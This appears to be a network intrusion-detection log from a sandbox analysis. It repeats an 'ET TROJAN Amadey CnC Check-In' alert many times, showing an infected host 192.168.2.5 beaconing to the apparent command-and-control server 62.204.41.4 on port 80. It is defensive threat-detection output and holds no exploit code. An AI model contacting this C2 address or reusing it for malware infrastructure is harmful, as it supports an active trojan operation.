SID:	2027700
Source Port:	49861
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449903802027700 02/07/23-19:57:59.838875
SID:	2027700
Source Port:	49903
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449991802027700 02/07/23-19:58:23.361807
SID:	2027700
Source Port:	49991
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450058802027700 02/07/23-19:58:41.573761
SID:	2027700
Source Port:	50058
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449950802027700 02/07/23-19:58:13.249773
SID:	2027700
Source Port:	49950
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449725802027700 02/07/23-19:57:11.991747
SID:	2027700
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449918802027700 02/07/23-19:58:03.708587
SID:	2027700
Source Port:	49918
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450053802027700 02/07/23-19:58:40.354567
SID:	2027700
Source Port:	50053
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450344802027700 02/07/23-20:00:01.675171
SID:	2027700
Source Port:	50344
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449823802027700 02/07/23-19:57:37.077825
SID:	2027700
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450148802027700 02/07/23-19:59:08.546698
SID:	2027700
Source Port:	50148
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450442802027700 02/07/23-20:00:28.613580
SID:	2027700
Source Port:	50442
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449841802027700 02/07/23-19:57:41.479215
SID:	2027700
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449997802027700 02/07/23-19:58:26.812666
SID:	2027700
Source Port:	49997
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450460802027700 02/07/23-20:00:32.743842
SID:	2027700
Source Port:	50460
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449851802027700 02/07/23-19:57:45.497082
SID:	2027700
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450264802027700 02/07/23-19:59:39.205304
SID:	2027700
Source Port:	50264
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450025802027700 02/07/23-19:58:33.797119
SID:	2027700
Source Port:	50025
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450166802027700 02/07/23-19:59:12.953354
SID:	2027700
Source Port:	50166
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450377802027700 02/07/23-20:00:10.926718
SID:	2027700
Source Port:	50377
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450007802027700 02/07/23-19:58:29.284926
SID:	2027700
Source Port:	50007
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450081802027700 02/07/23-19:58:49.575685
SID:	2027700
Source Port:	50081
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450359802027700 02/07/23-20:00:06.547654
SID:	2027700
Source Port:	50359
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450086802027700 02/07/23-19:58:50.782617
SID:	2027700
Source Port:	50086
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450282802027700 02/07/23-19:59:45.658356
SID:	2027700
Source Port:	50282
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450203802027700 02/07/23-19:59:22.078648
SID:	2027700
Source Port:	50203
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449954802027700 02/07/23-19:58:14.184522
SID:	2027700
Source Port:	49954
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449758802027700 02/07/23-19:57:19.484125
SID:	2027700
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450043802027700 02/07/23-19:58:37.945632
SID:	2027700
Source Port:	50043
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450002802027700 02/07/23-19:58:27.980529
SID:	2027700
Source Port:	50002
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450221802027700 02/07/23-19:59:28.870563
SID:	2027700
Source Port:	50221
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449946802027700 02/07/23-19:58:12.312159
SID:	2027700
Source Port:	49946
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450316802027700 02/07/23-19:59:53.881599
SID:	2027700
Source Port:	50316
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450470802027700 02/07/23-20:00:35.113671
SID:	2027700
Source Port:	50470
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449969802027700 02/07/23-19:58:17.745575
SID:	2027700
Source Port:	49969
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450020802027700 02/07/23-19:58:32.557219
SID:	2027700
Source Port:	50020
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449928802027700 02/07/23-19:58:08.200692
SID:	2027700
Source Port:	49928
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450061802027700 02/07/23-19:58:42.609485
SID:	2027700
Source Port:	50061
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449768802027700 02/07/23-19:57:21.340554
SID:	2027700
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449987802027700 02/07/23-19:58:22.091332
SID:	2027700
Source Port:	49987
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450292802027700 02/07/23-19:59:48.086269
SID:	2027700
Source Port:	50292
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449763802027700 02/07/23-19:57:20.363784
SID:	2027700
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449964802027700 02/07/23-19:58:16.564709
SID:	2027700
Source Port:	49964
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450369802027700 02/07/23-20:00:08.954484
SID:	2027700
Source Port:	50369
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450387802027700 02/07/23-20:00:13.346042
SID:	2027700
Source Port:	50387
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449786802027700 02/07/23-19:57:28.358002
SID:	2027700
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449982802027700 02/07/23-19:58:20.917525
SID:	2027700
Source Port:	49982
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450091802027700 02/07/23-19:58:52.034089
SID:	2027700
Source Port:	50091
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450211802027700 02/07/23-19:59:26.414967
SID:	2027700
Source Port:	50211
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449959802027700 02/07/23-19:58:15.371241
SID:	2027700
Source Port:	49959
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450404802027700 02/07/23-20:00:17.416361
SID:	2027700
Source Port:	50404
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449800802027700 02/07/23-19:57:31.745131
SID:	2027700
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450033802027700 02/07/23-19:58:35.799544
SID:	2027700
Source Port:	50033
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450030802027700 02/07/23-19:58:35.059294
SID:	2027700
Source Port:	50030
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450367802027700 02/07/23-20:00:08.484564
SID:	2027700
Source Port:	50367
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450382802027700 02/07/23-20:00:12.143005
SID:	2027700
Source Port:	50382
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450189802027700 02/07/23-19:59:18.468588
SID:	2027700
Source Port:	50189
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450459802027700 02/07/23-20:00:32.490579
SID:	2027700
Source Port:	50459
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449956802027700 02/07/23-19:58:14.672244
SID:	2027700
Source Port:	49956
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450107802027700 02/07/23-19:58:55.941894
SID:	2027700
Source Port:	50107
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450339802027700 02/07/23-19:59:59.425942
SID:	2027700
Source Port:	50339
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450048802027700 02/07/23-19:58:39.136453
SID:	2027700
Source Port:	50048
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449778802027700 02/07/23-19:57:24.022380
SID:	2027700
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449892802027700 02/07/23-19:57:57.200519
SID:	2027700
Source Port:	49892
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450241802027700 02/07/23-19:59:33.653837
SID:	2027700
Source Port:	50241
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450397802027700 02/07/23-20:00:15.752527
SID:	2027700
Source Port:	50397
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450440802027700 02/07/23-20:00:28.144249
SID:	2027700
Source Port:	50440
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450226802027700 02/07/23-19:59:30.062964
SID:	2027700
Source Port:	50226
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449821802027700 02/07/23-19:57:36.603814
SID:	2027700
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450063802027700 02/07/23-19:58:43.919705
SID:	2027700
Source Port:	50063
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449773802027700 02/07/23-19:57:22.545756
SID:	2027700
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450318802027700 02/07/23-19:59:54.361124
SID:	2027700
Source Port:	50318
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449913802027700 02/07/23-19:58:02.266316
SID:	2027700
Source Port:	49913
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449992802027700 02/07/23-19:58:23.691995
SID:	2027700
Source Port:	49992
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449995802027700 02/07/23-19:58:25.960796
SID:	2027700
Source Port:	49995
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450354802027700 02/07/23-20:00:05.364849
SID:	2027700
Source Port:	50354
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449735802027700 02/07/23-19:57:14.444183
SID:	2027700
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449776802027700 02/07/23-19:57:23.344979
SID:	2027700
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450432802027700 02/07/23-20:00:26.215534
SID:	2027700
Source Port:	50432
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450313802027700 02/07/23-19:59:53.159401
SID:	2027700
Source Port:	50313
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449854802027700 02/07/23-19:57:48.147586
SID:	2027700
Source Port:	49854
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450395802027700 02/07/23-20:00:15.267609
SID:	2027700
Source Port:	50395
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450005802027700 02/07/23-19:58:28.753873
SID:	2027700
Source Port:	50005
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449984802027700 02/07/23-19:58:21.387139
SID:	2027700
Source Port:	49984
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450176802027700 02/07/23-19:59:15.314802
SID:	2027700
Source Port:	50176
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449813802027700 02/07/23-19:57:34.897396
SID:	2027700
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450135802027700 02/07/23-19:59:05.579215
SID:	2027700
Source Port:	50135
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449926802027700 02/07/23-19:58:07.720137
SID:	2027700
Source Port:	49926
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449707802027700 02/07/23-19:57:08.383912
SID:	2027700
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450071802027700 02/07/23-19:58:47.153403
SID:	2027700
Source Port:	50071
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450254802027700 02/07/23-19:59:36.757803
SID:	2027700
Source Port:	50254
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450326802027700 02/07/23-19:59:56.296800
SID:	2027700
Source Port:	50326
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450290802027700 02/07/23-19:59:47.592742
SID:	2027700
Source Port:	50290
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449748802027700 02/07/23-19:57:17.627780
SID:	2027700
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449967802027700 02/07/23-19:58:17.264761
SID:	2027700
Source Port:	49967
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450076802027700 02/07/23-19:58:48.365768
SID:	2027700
Source Port:	50076
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450295802027700 02/07/23-19:59:48.802433
SID:	2027700
Source Port:	50295
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450213802027700 02/07/23-19:59:26.928062
SID:	2027700
Source Port:	50213
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450035802027700 02/07/23-19:58:36.040025
SID:	2027700
Source Port:	50035
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449789802027700 02/07/23-19:57:29.074930
SID:	2027700
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450056802027700 02/07/23-19:58:41.093535
SID:	2027700
Source Port:	50056
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450145802027700 02/07/23-19:59:07.823731
SID:	2027700
Source Port:	50145
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449783802027700 02/07/23-19:57:27.313901
SID:	2027700
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449933802027700 02/07/23-19:58:09.387568
SID:	2027700
Source Port:	49933
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449961802027700 02/07/23-19:58:15.841480
SID:	2027700
Source Port:	49961
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449844802027700 02/07/23-19:57:42.215376
SID:	2027700
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

